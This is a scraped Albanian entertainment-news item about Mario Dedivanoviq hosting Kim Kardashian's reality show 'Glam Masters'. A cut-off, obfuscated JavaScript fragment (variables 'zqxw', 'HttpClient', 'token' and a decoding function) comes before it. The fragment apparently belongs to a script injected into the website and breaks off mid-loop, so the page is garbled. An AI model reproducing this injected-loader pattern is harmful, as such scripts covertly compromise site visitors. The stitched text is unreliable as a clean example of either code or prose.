;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Po Vjen: Shqiptari Mario Dedivanoviq emision me Kim Kardashian

By

“Glam Masters” do të quhet dhe do të jetë emisioni më i ri që për producente do të ketë Kim Kardashian, e në rol kryesor është artisti i saj i make up, shqiptari Mario Dedivanoviq.

Ky emision që do jetë një “reality show”, do të vijë në ekranet tona në shkurtin e vitit 2018-të.

Debutimin do ta ketë në datën 28 shkurt në orën 10-të të mbrëmjes e për nikoqir ka Laverne Cos e Dedivanoviq.

Kurse, ekspertët e grimit të famshëm në Youtube, Kandee Johnson dhe Zanna Roberts Rassi, do të shërbejnë si gjyqtarë.

Tashmë është publikuar edhe traileri i emisionit, ndërsa në Instagram Dedivanoviq shkruan: “Oh Zoti im! Jam i ekzaltuar që po e ndaj këtë eksperiencë që ka të bëjë me kompeticion bukurie! Hyra në këtë projekt duke u ndjerë i pasigurt, pak i frikësuar dhe nuk kisha ide çfarë të prisja”, ka shkruar Mario. /Prive.al

Artikuj të ngjashëm